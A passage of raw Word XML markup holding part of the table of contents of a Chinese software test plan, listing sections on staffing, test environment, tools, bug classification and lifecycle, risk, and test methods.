            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630294 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="62A832FA" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630295" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>4.1.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>人力资源分工</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630295 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="69B89BDA" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630296" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>4.2.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>测试环境安排和使用</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630296 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6A3FDDC6" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630297" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>4.3.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>所需的合作方配合</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630297 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>12</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2F2BDE21" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630298" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>4.4.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>测试所需工具</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630298 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>13</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="40F572BA" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630299" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>4.5.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> Bug</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>分类</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630299 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>13</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="233F2223" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630300" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>4.6.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> Bug</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>等级</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630300 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>14</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="480D6704" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630301" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>4.7.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> Bug</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>生命周期</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630301 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>15</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4535D72D" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:spacing w:before="312"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630302" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w14:scene3d>
              <w14:camera w14:prst="orthographicFront"/>
              <w14:lightRig w14:rig="threePt" w14:dir="t">
                <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
              </w14:lightRig>
            </w14:scene3d>
          </w:rPr>
          <w:t>5.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>风险预估和应对</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630302 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>17</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3D8CA134" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:spacing w:before="312"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630303" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w14:scene3d>
              <w14:camera w14:prst="orthographicFront"/>
              <w14:lightRig w14:rig="threePt" w14:dir="t">
                <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
              </w14:lightRig>
            </w14:scene3d>
          </w:rPr>
          <w:t>6.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>准入测试方案</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630303 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>19</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="57112925" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:spacing w:before="312"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630304" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w14:scene3d>
              <w14:camera w14:prst="orthographicFront"/>
              <w14:lightRig w14:rig="threePt" w14:dir="t">
                <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
              </w14:lightRig>
            </w14:scene3d>
          </w:rPr>
          <w:t>7.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>测试分类和方法</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630304 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>20</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="486467CD" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630305" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>7.1.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> Case</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>设计和管理的规范</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630305 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>20</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4EEF0AE0" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630306" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>7.2.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>测试分类</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630306 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>20</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="43810054" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630307" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>7.3.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>分模块制定测试方法</w:t>
        </w:r>
        <w:r>
          <w:rPr>
